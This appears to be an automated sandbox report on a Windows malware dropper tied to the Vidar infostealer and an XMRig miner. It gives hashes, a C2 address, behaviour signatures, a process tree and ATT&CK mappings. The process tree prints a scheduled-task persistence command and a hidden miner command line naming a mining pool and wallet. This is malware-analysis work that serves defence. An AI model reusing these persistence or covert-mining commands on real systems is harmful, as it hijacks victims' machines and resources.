Analysis

  • max time kernel
    188s
  • max time network
    199s
  • platform
    windows10_x64
  • resource
    win10-en-20211104
  • submitted
    10-11-2021 15:02

General

  • Target

    f4eb00edcbe216c7520fee4b0bb806e612c5a78c5d3da46f1f6fed3678dacad2.exe

  • Size

    1.6MB

  • MD5

    5f84034c670130aa2f3959e8b2f516de

  • SHA1

    46b026c3a74b5770c0da55760f143d6d86cb6d5f

  • SHA256

    f4eb00edcbe216c7520fee4b0bb806e612c5a78c5d3da46f1f6fed3678dacad2

  • SHA512

    7f4847b630b9529cbd495b17221e6562cb694fddf36babd1ff40811f71060027732dd1dacd7899b8479f41f2f4adc31c7f7b8757440d6f4bf7b6edcc4f07156a

Malware Config

Extracted

Family

vidar

Version

41.5

Botnet

933

C2

https://mas.to/@xeroxxx

Attributes
  • profile_id

    933

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Vidar Stealer 2 IoCs
  • XMRig Miner Payload 3 IoCs
  • Executes dropped EXE 14 IoCs
  • Loads dropped DLL 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 10 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 16 IoCs
  • Modifies registry class 16 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:380
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
      1⤵
      • Drops file in System32 directory
      PID:1044
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Themes
      1⤵
        PID:1224
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s SENS
        1⤵
          PID:1448
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s UserManager
          1⤵
            PID:1400
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
            1⤵
              PID:1116
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s BITS
              1⤵
              • Suspicious use of SetThreadContext
              • Modifies registry class
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3928
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k SystemNetworkService
                2⤵
                • Drops file in System32 directory
                • Checks processor information in registry
                • Modifies data under HKEY_USERS
                • Modifies registry class
                PID:964
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s WpnService
              1⤵
                PID:2688
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                1⤵
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:2664
                • C:\Windows\system32\wbem\WMIADAP.EXE
                  wmiadap.exe /F /T /R
                  2⤵
                    PID:1792
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Browser
                  1⤵
                    PID:2560
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                    1⤵
                      PID:2388
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                      1⤵
                        PID:2356
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                        1⤵
                          PID:1820
                        • C:\Users\Admin\AppData\Local\Temp\f4eb00edcbe216c7520fee4b0bb806e612c5a78c5d3da46f1f6fed3678dacad2.exe
                          "C:\Users\Admin\AppData\Local\Temp\f4eb00edcbe216c7520fee4b0bb806e612c5a78c5d3da46f1f6fed3678dacad2.exe"
                          1⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1032
                          • C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe
                            "C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"
                            2⤵
                            • Executes dropped EXE
                            PID:1840
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1840 -s 1020
                              3⤵
                              • Suspicious use of NtCreateProcessExOtherParentProcess
                              • Program crash
                              • Suspicious behavior: EnumeratesProcesses
                              PID:4092
                          • C:\Users\Admin\AppData\Local\Temp\2.exe
                            "C:\Users\Admin\AppData\Local\Temp\2.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:888
                          • C:\Users\Admin\AppData\Local\Temp\4.exe
                            "C:\Users\Admin\AppData\Local\Temp\4.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3808
                          • C:\Users\Admin\AppData\Local\Temp\setup.exe
                            "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:3428
                            • C:\Users\Admin\AppData\Local\Temp\is-Q5E2I.tmp\setup.tmp
                              "C:\Users\Admin\AppData\Local\Temp\is-Q5E2I.tmp\setup.tmp" /SL5="$4017C,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"
                              3⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of WriteProcessMemory
                              PID:824
                              • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                "C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
                                4⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:1652
                                • C:\Users\Admin\AppData\Local\Temp\is-J3KPE.tmp\setup.tmp
                                  "C:\Users\Admin\AppData\Local\Temp\is-J3KPE.tmp\setup.tmp" /SL5="$701DC,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
                                  5⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  PID:3584
                          • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                            "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                            2⤵
                            • Executes dropped EXE
                            PID:2092
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2092 -s 548
                              3⤵
                              • Program crash
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2060
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2092 -s 704
                              3⤵
                              • Program crash
                              • Suspicious behavior: EnumeratesProcesses
                              PID:3260
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2092 -s 764
                              3⤵
                              • Program crash
                              • Suspicious behavior: EnumeratesProcesses
                              PID:600
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2092 -s 940
                              3⤵
                              • Program crash
                              PID:1308
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2092 -s 964
                              3⤵
                              • Program crash
                              PID:940
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2092 -s 1020
                              3⤵
                              • Program crash
                              PID:780
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2092 -s 728
                              3⤵
                              • Program crash
                              PID:2232
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2092 -s 1388
                              3⤵
                              • Program crash
                              PID:4068
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2092 -s 1408
                              3⤵
                              • Program crash
                              PID:1740
                          • C:\Users\Admin\AppData\Local\Temp\xywang-game.exe
                            "C:\Users\Admin\AppData\Local\Temp\xywang-game.exe"
                            2⤵
                            • Executes dropped EXE
                            PID:3960
                          • C:\Users\Admin\AppData\Local\Temp\6.exe
                            "C:\Users\Admin\AppData\Local\Temp\6.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3548
                          • C:\Users\Admin\AppData\Local\Temp\Chrome9.exe
                            "C:\Users\Admin\AppData\Local\Temp\Chrome9.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:3204
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                              3⤵
                              • Suspicious use of WriteProcessMemory
                              PID:3924
                              • C:\Windows\system32\schtasks.exe
                                schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                4⤵
                                • Creates scheduled task(s)
                                PID:848
                            • C:\Users\Admin\AppData\Roaming\services64.exe
                              "C:\Users\Admin\AppData\Roaming\services64.exe"
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              • Suspicious use of WriteProcessMemory
                              PID:1328
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:2224
                                • C:\Windows\system32\schtasks.exe
                                  schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                  5⤵
                                  • Creates scheduled task(s)
                                  PID:1656
                              • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                4⤵
                                • Executes dropped EXE
                                PID:1976
                              • C:\Windows\explorer.exe
                                C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.sprite/password --pass= --cpu-max-threads-hint=40 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6D5Kw+SNPLfPB2ukC//O063ow4gpmyCIpKu2yHpDxuv7" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                                4⤵
                                  PID:2196
                            • C:\Users\Admin\AppData\Local\Temp\BearVpn.exe
                              "C:\Users\Admin\AppData\Local\Temp\BearVpn.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2732
                          • C:\Windows\system32\rundll32.exe
                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                            1⤵
                            • Process spawned unexpected child process
                            • Suspicious use of WriteProcessMemory
                            PID:3136
                            • C:\Windows\SysWOW64\rundll32.exe
                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                              2⤵
                              • Loads dropped DLL
                              • Modifies registry class
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:2284

                          Network

                          MITRE ATT&CK Matrix ATT&CK v6

                          Execution

                          Scheduled Task

                          1
                          T1053

                          Persistence

                          Scheduled Task

                          1
                          T1053

                          Privilege Escalation

                          Scheduled Task

                          1
                          T1053

                          Discovery

                          System Information Discovery

                          2
                          T1082

                          Query Registry

                          1
                          T1012

                          Command and Control

                          Web Service

                          1
                          T1102

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\Users\Admin\AppData\Local\Temp\2.exe
                            MD5

                            664801e357b168d4ded25eff6d2046df

                            SHA1

                            69e727c78a9db1465ea497f32a4fae376a4a2db5

                            SHA256

                            0e862f31f561e5c2e543af65c94532f367bafb404c669de39689493c84bd3e24

                            SHA512

                            313e4b682a1702770e9407124f996923c29ce216cdd604308bb563a68c527a587dac808de087965736ffd6273a28fd77111788150f4925f1bad85d4700ed31c5

                          • C:\Users\Admin\AppData\Local\Temp\2.exe
                            MD5

                            664801e357b168d4ded25eff6d2046df

                            SHA1

                            69e727c78a9db1465ea497f32a4fae376a4a2db5

                            SHA256

                            0e862f31f561e5c2e543af65c94532f367bafb404c669de39689493c84bd3e24

                            SHA512

                            313e4b682a1702770e9407124f996923c29ce216cdd604308bb563a68c527a587dac808de087965736ffd6273a28fd77111788150f4925f1bad85d4700ed31c5

                          • C:\Users\Admin\AppData\Local\Temp\4.exe
                            MD5

                            139ca31fedefdb7aaf220f8d530d1b28

                            SHA1

                            e53bacbde3d614f8d344ef06af379c27ba20cf1d

                            SHA256

                            6d91fe9749f2a2e4190be0fff72a6eec16d40f3deca101a28fd6dee8bdd0595b

                            SHA512

                            3f0cc069e1d6f602620a04f59ed424300c8eb4245544a8652cef67fc148ed8189941dbeada666802d8820ec4bf23083e00979cff32215e9683c0a326350413db

                          • C:\Users\Admin\AppData\Local\Temp\4.exe
                            MD5

                            139ca31fedefdb7aaf220f8d530d1b28

                            SHA1

                            e53bacbde3d614f8d344ef06af379c27ba20cf1d

                            SHA256

                            6d91fe9749f2a2e4190be0fff72a6eec16d40f3deca101a28fd6dee8bdd0595b

                            SHA512

                            3f0cc069e1d6f602620a04f59ed424300c8eb4245544a8652cef67fc148ed8189941dbeada666802d8820ec4bf23083e00979cff32215e9683c0a326350413db

                          • C:\Users\Admin\AppData\Local\Temp\6.exe
                            MD5

                            37a4080321f8c745867b8e94dc36b282

                            SHA1

                            2328703ff4d3b76dec012a692049d0884526f944

                            SHA256

                            436813e3efc77d72521861f5d188cc763902bd590d9a370a63816e68b8c81825

                            SHA512

                            79d22153a8357580b0d3beea1674ac7829753eb8ca7336e06cb3d4e00879314259f1d9fc5fdd1e884d80c72c1a877dc76097d7648ea63f1e30a70bd068ce190c

                          • C:\Users\Admin\AppData\Local\Temp\6.exe
                            MD5

                            37a4080321f8c745867b8e94dc36b282

                            SHA1

                            2328703ff4d3b76dec012a692049d0884526f944

                            SHA256

                            436813e3efc77d72521861f5d188cc763902bd590d9a370a63816e68b8c81825

                            SHA512

                            79d22153a8357580b0d3beea1674ac7829753eb8ca7336e06cb3d4e00879314259f1d9fc5fdd1e884d80c72c1a877dc76097d7648ea63f1e30a70bd068ce190c

                          • C:\Users\Admin\AppData\Local\Temp\BearVpn.exe
                            MD5

                            84ea7e8721e93059d0ab422848a62440

                            SHA1

                            312fd30384eb3571202fb30e9672c6057af1ff61

                            SHA256

                            b715069b9555be22f3e30ea7458249df6feac3f55494dd9bb9d41734e8bb7807

                            SHA512

                            3d733547114900cd01bd391edc658a9deeabe3b6bc3e9ab672dbbda6b195adbd3d8f6c5cb94d2c4314fb72471d8ab44a21148a150b192ca2f4da1512d0474435

                          • C:\Users\Admin\AppData\Local\Temp\BearVpn.exe
                            MD5

                            84ea7e8721e93059d0ab422848a62440

                            SHA1

                            312fd30384eb3571202fb30e9672c6057af1ff61

                            SHA256

                            b715069b9555be22f3e30ea7458249df6feac3f55494dd9bb9d41734e8bb7807

                            SHA512

                            3d733547114900cd01bd391edc658a9deeabe3b6bc3e9ab672dbbda6b195adbd3d8f6c5cb94d2c4314fb72471d8ab44a21148a150b192ca2f4da1512d0474435

                          • C:\Users\Admin\AppData\Local\Temp\Chrome9.exe
                            MD5

                            45d7b12b2045c24f2bf2dd001680833f

                            SHA1

                            e0e6a8a15992b74b88ec45f7f50e908e927a0058

                            SHA256

                            e323c1631823f082e1309a53662396a7d4ff656e0b5ad263c5b6be04e04d97d6

                            SHA512

                            b3f9c66caff3c2ae38a6abb29dfab506213c334c66e4594f59a667cb674fd40346bd995e03b775ce1ef9d5b33fb805ae72362680a8ea1a7cf673e94d64de84fc

                          • C:\Users\Admin\AppData\Local\Temp\Chrome9.exe
                            MD5

                            45d7b12b2045c24f2bf2dd001680833f

                            SHA1

                            e0e6a8a15992b74b88ec45f7f50e908e927a0058

                            SHA256

                            e323c1631823f082e1309a53662396a7d4ff656e0b5ad263c5b6be04e04d97d6

                            SHA512

                            b3f9c66caff3c2ae38a6abb29dfab506213c334c66e4594f59a667cb674fd40346bd995e03b775ce1ef9d5b33fb805ae72362680a8ea1a7cf673e94d64de84fc

                          • C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe
                            MD5

                            ad761e69d7ed084799373bd25da3dc9f

                            SHA1

                            7d1f5f11f597fb770faa8edbe4de6f456699ccd7

                            SHA256

                            94e6554669ce8d5eef4408c677315ad54b47b6a85b32365e69f5a2a3b4bb76c4

                            SHA512

                            524284e114ee2bedc94dfd8ea0cce84384db0dfe3ff58a303f85325f76a094ab93f8b7f7350f070a98a727c95956b0cc3869e670c95a344cfea52c715afa2ade

                          • C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe
                            MD5

                            ad761e69d7ed084799373bd25da3dc9f

                            SHA1

                            7d1f5f11f597fb770faa8edbe4de6f456699ccd7

                            SHA256

                            94e6554669ce8d5eef4408c677315ad54b47b6a85b32365e69f5a2a3b4bb76c4

                            SHA512

                            524284e114ee2bedc94dfd8ea0cce84384db0dfe3ff58a303f85325f76a094ab93f8b7f7350f070a98a727c95956b0cc3869e670c95a344cfea52c715afa2ade

                          • C:\Users\Admin\AppData\Local\Temp\is-J3KPE.tmp\setup.tmp
                            MD5

                            9303156631ee2436db23827e27337be4

                            SHA1

                            018e0d5b6ccf7000e36af30cebeb8adc5667e5fa

                            SHA256

                            bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4

                            SHA512

                            9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

                          • C:\Users\Admin\AppData\Local\Temp\is-J3KPE.tmp\setup.tmp
                            MD5

                            9303156631ee2436db23827e27337be4

                            SHA1

                            018e0d5b6ccf7000e36af30cebeb8adc5667e5fa

                            SHA256

                            bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4

                            SHA512

                            9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

                          • C:\Users\Admin\AppData\Local\Temp\is-Q5E2I.tmp\setup.tmp
                            MD5

                            9303156631ee2436db23827e27337be4

                            SHA1

                            018e0d5b6ccf7000e36af30cebeb8adc5667e5fa

                            SHA256

                            bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4

                            SHA512

                            9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

                          • C:\Users\Admin\AppData\Local\Temp\is-Q5E2I.tmp\setup.tmp
                            MD5

                            9303156631ee2436db23827e27337be4

                            SHA1

                            018e0d5b6ccf7000e36af30cebeb8adc5667e5fa

                            SHA256

                            bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4

                            SHA512

                            9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

                          • C:\Users\Admin\AppData\Local\Temp\setup.exe
                            MD5

                            429d0e06d7add76fdbfeb404a7bf4469

                            SHA1

                            11dedd36c146ae82f6a46360a6c5019284cc86f2

                            SHA256

                            32dccba4478d58b4e41bbf18f9d7532fd7d49ba6429b460b377f01e3f9bab736

                            SHA512

                            1443c7fc5a07ea82bb1a19211ee73a14e17961dd275e0d9118196ae99fae0de47a67e3ca74e50e90248923691d816aa50acb88329407f6128a2fe30bf405bee4

                          • C:\Users\Admin\AppData\Local\Temp\setup.exe
                            MD5

                            429d0e06d7add76fdbfeb404a7bf4469

                            SHA1

                            11dedd36c146ae82f6a46360a6c5019284cc86f2

                            SHA256

                            32dccba4478d58b4e41bbf18f9d7532fd7d49ba6429b460b377f01e3f9bab736

                            SHA512

                            1443c7fc5a07ea82bb1a19211ee73a14e17961dd275e0d9118196ae99fae0de47a67e3ca74e50e90248923691d816aa50acb88329407f6128a2fe30bf405bee4

                          • C:\Users\Admin\AppData\Local\Temp\setup.exe
                            MD5

                            429d0e06d7add76fdbfeb404a7bf4469

                            SHA1

                            11dedd36c146ae82f6a46360a6c5019284cc86f2

                            SHA256

                            32dccba4478d58b4e41bbf18f9d7532fd7d49ba6429b460b377f01e3f9bab736

                            SHA512

                            1443c7fc5a07ea82bb1a19211ee73a14e17961dd275e0d9118196ae99fae0de47a67e3ca74e50e90248923691d816aa50acb88329407f6128a2fe30bf405bee4

                          • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                            MD5

                            fe97f37b39dbf9233dc1c551336c9d53

                            SHA1

                            28b4bcc86c0a9774c7e9e17e7610a727f8246d9b

                            SHA256

                            fe613a19f67593ee8e0717c90b4ee2297479f5ad326abc32dba42631bc368ef3

                            SHA512

                            b9786a96dc6aa415e125d6b5804c55404258e11d83219ab02b7f8bb232681f61046adf1683f7bc540ea5d7a5fc80174fad81bf88455fbc77b004b70f7b61373a

                          • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                            MD5

                            fe97f37b39dbf9233dc1c551336c9d53

                            SHA1

                            28b4bcc86c0a9774c7e9e17e7610a727f8246d9b

                            SHA256

                            fe613a19f67593ee8e0717c90b4ee2297479f5ad326abc32dba42631bc368ef3

                            SHA512

                            b9786a96dc6aa415e125d6b5804c55404258e11d83219ab02b7f8bb232681f61046adf1683f7bc540ea5d7a5fc80174fad81bf88455fbc77b004b70f7b61373a

                          • C:\Users\Admin\AppData\Local\Temp\sqlite.dat
                            MD5

                            1a760d990f38770a373f019bef6dabc3

                            SHA1

                            b8c28e6a067a042990ea1dd1c607e0dd995903c9

                            SHA256

                            9dd5803a758802a07ca64e7943b1fbebb4e1c71ddeb0112622fa5ce1b0a2cb32

                            SHA512

                            bacc11c327cd55580a07f9686c412616376b5535515d8d07c0d61d437779632f6460149d2bd6e84acec5c658fe21b06a0cd6303ca95f3ac82c64b3246abc590e

                          • C:\Users\Admin\AppData\Local\Temp\sqlite.dll
                            MD5

                            d2c3e38d64273ea56d503bb3fb2a8b5d

                            SHA1

                            177da7d99381bbc83ede6b50357f53944240d862

                            SHA256

                            25ceb44c2ba4fc9e0153a2f605a70a58b0a42dfaa795667adc11c70bb8909b52

                            SHA512

                            2c21ecf8cbad2efe94c7cb55092e5b9e5e8c0392ee15ad04d1571f787761bf26f2f52f3d75a83a321952aeff362a237024779bbdc9c6fd4972c9d76c6038b117

                          • C:\Users\Admin\AppData\Local\Temp\xywang-game.exe
                            MD5

                            199ac38e98448f915974878daeac59d5

                            SHA1

                            ec36afe8b99d254b6983009930f70d51232be57e

                            SHA256

                            b3f30bbad084a12ea28f3c21157083b1e0d30ca57e0da4e678d8567b5eb79dcf

                            SHA512

                            61af8746f073870dd632adb7cca4cec0f4772ea5737b25da1cce1f7104a5826019ea72ba84174b7758b73b2cd3fd8320c3acffd1bd5f96704d4061323413867e

                          • C:\Users\Admin\AppData\Local\Temp\xywang-game.exe
                            MD5

                            199ac38e98448f915974878daeac59d5

                            SHA1

                            ec36afe8b99d254b6983009930f70d51232be57e

                            SHA256

                            b3f30bbad084a12ea28f3c21157083b1e0d30ca57e0da4e678d8567b5eb79dcf

                            SHA512

                            61af8746f073870dd632adb7cca4cec0f4772ea5737b25da1cce1f7104a5826019ea72ba84174b7758b73b2cd3fd8320c3acffd1bd5f96704d4061323413867e

                          • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                            MD5

                            0a2b061aaf0160c6aeb35c1a19af909c

                            SHA1

                            ae5af0681c71f13bc4ca4a9ab0603dc4c1e1ce3e

                            SHA256

                            c53c323877f93d64eb6de9e1def84278c6dca9ff6c6b15a5eddfeedd4f8f465c

                            SHA512

                            e2008a303f5db993eb831deca809a37a39479e0ebf2877b8f25dea8f17a06d38e9780c23235b23036da967ade06152bab40e8e405902f6912f7fa9c6b82cdb7c

                          • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                            MD5

                            0a2b061aaf0160c6aeb35c1a19af909c

                            SHA1

                            ae5af0681c71f13bc4ca4a9ab0603dc4c1e1ce3e

                            SHA256

                            c53c323877f93d64eb6de9e1def84278c6dca9ff6c6b15a5eddfeedd4f8f465c

                            SHA512

                            e2008a303f5db993eb831deca809a37a39479e0ebf2877b8f25dea8f17a06d38e9780c23235b23036da967ade06152bab40e8e405902f6912f7fa9c6b82cdb7c

                          • C:\Users\Admin\AppData\Roaming\services64.exe
                            MD5

                            45d7b12b2045c24f2bf2dd001680833f

                            SHA1

                            e0e6a8a15992b74b88ec45f7f50e908e927a0058

                            SHA256

                            e323c1631823f082e1309a53662396a7d4ff656e0b5ad263c5b6be04e04d97d6

                            SHA512

                            b3f9c66caff3c2ae38a6abb29dfab506213c334c66e4594f59a667cb674fd40346bd995e03b775ce1ef9d5b33fb805ae72362680a8ea1a7cf673e94d64de84fc

                          • C:\Users\Admin\AppData\Roaming\services64.exe
                            MD5

                            45d7b12b2045c24f2bf2dd001680833f

                            SHA1

                            e0e6a8a15992b74b88ec45f7f50e908e927a0058

                            SHA256

                            e323c1631823f082e1309a53662396a7d4ff656e0b5ad263c5b6be04e04d97d6

                            SHA512

                            b3f9c66caff3c2ae38a6abb29dfab506213c334c66e4594f59a667cb674fd40346bd995e03b775ce1ef9d5b33fb805ae72362680a8ea1a7cf673e94d64de84fc

                          • \Users\Admin\AppData\Local\Temp\is-J9E1K.tmp\idp.dll
                            MD5

                            b37377d34c8262a90ff95a9a92b65ed8

                            SHA1

                            faeef415bd0bc2a08cf9fe1e987007bf28e7218d

                            SHA256

                            e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f

                            SHA512

                            69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

                          • \Users\Admin\AppData\Local\Temp\is-MMLI0.tmp\idp.dll
                            MD5

                            b37377d34c8262a90ff95a9a92b65ed8

                            SHA1

                            faeef415bd0bc2a08cf9fe1e987007bf28e7218d

                            SHA256

                            e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f

                            SHA512

                            69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

                          • \Users\Admin\AppData\Local\Temp\sqlite.dll
                            MD5

                            d2c3e38d64273ea56d503bb3fb2a8b5d

                            SHA1

                            177da7d99381bbc83ede6b50357f53944240d862

                            SHA256

                            25ceb44c2ba4fc9e0153a2f605a70a58b0a42dfaa795667adc11c70bb8909b52

                            SHA512

                            2c21ecf8cbad2efe94c7cb55092e5b9e5e8c0392ee15ad04d1571f787761bf26f2f52f3d75a83a321952aeff362a237024779bbdc9c6fd4972c9d76c6038b117

                          • memory/380-212-0x0000027729CA0000-0x0000027729D12000-memory.dmp
                            Filesize

                            456KB

                          • memory/380-193-0x00000277294C0000-0x00000277294C2000-memory.dmp
                            Filesize

                            8KB

                          • memory/380-194-0x00000277294C0000-0x00000277294C2000-memory.dmp
                            Filesize

                            8KB

                          • memory/824-173-0x00000000001E0000-0x00000000001E1000-memory.dmp
                            Filesize

                            4KB

                          • memory/824-168-0x0000000000000000-mapping.dmp
                          • memory/848-242-0x0000000000000000-mapping.dmp
                          • memory/888-137-0x000000001AF80000-0x000000001AF82000-memory.dmp
                            Filesize

                            8KB

                          • memory/888-124-0x0000000000000000-mapping.dmp
                          • memory/888-127-0x00000000002F0000-0x00000000002F1000-memory.dmp
                            Filesize

                            4KB

                          • memory/964-191-0x00007FF680254060-mapping.dmp
                          • memory/964-192-0x0000016B27EE0000-0x0000016B27EE2000-memory.dmp
                            Filesize

                            8KB

                          • memory/964-213-0x0000016B27E40000-0x0000016B27EB2000-memory.dmp
                            Filesize

                            456KB

                          • memory/964-236-0x0000016B29930000-0x0000016B2994B000-memory.dmp
                            Filesize

                            108KB

                          • memory/964-195-0x0000016B27EE0000-0x0000016B27EE2000-memory.dmp
                            Filesize

                            8KB

